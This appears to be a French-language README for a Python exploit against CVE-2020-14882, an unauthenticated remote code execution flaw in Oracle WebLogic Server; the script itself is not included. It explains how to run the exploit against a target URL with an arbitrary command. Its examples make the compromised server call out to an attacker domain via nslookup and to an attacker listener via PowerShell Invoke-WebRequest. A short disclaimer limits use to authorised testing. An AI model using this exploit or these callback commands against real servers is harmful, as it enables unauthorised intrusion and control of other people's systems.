
Ce script permet l'exécution de code à distance (RCE) sur Oracle WebLogic Server.
Ce script permet l'exécution de code à distance (RCE) sur Oracle WebLogic Server à l'aide d'une requête GET non authentifiée. Il exploite la vulnérabilité CVE-2020-14882. En exécutant des commandes arbitraires, un attaquant peut obtenir un accès non autorisé au serveur.
Assurez-vous d'avoir Python 3 installé. Pour utiliser ce script, suivez les étapes ci-dessous :
Ouvrez un terminal ou une invite de commandes.
Exécutez le script à l'aide de la commande suivante :
python3 exploit.py http(s)://target:7001 command
Remplacez http(s)://target:7001 par l'URL cible du serveur Oracle WebLogic Server, puis par la commande souhaitée à exécuter.
commandExemple 1 :
python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
Cet exemple exécute la commande nslookup your_Domain sur le serveur cible.
Exemple 2 :
python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
Cet exemple exécute la commande PowerShell Invoke-WebRequest -Uri http://your_listener sur le serveur cible.
Ce script est destiné uniquement aux tests d'intrusion autorisés et à des fins de recherche en sécurité. L'utilisation non autorisée de ce script pour exploiter des systèmes sans consentement approprié est illégale et peut entraîner des conséquences juridiques. Utilisez-le à vos propres risques.
Ce script nécessite les dépendances suivantes :
requestsurllib3Veuillez vous assurer que ces dépendances sont installées avant d'exécuter le script.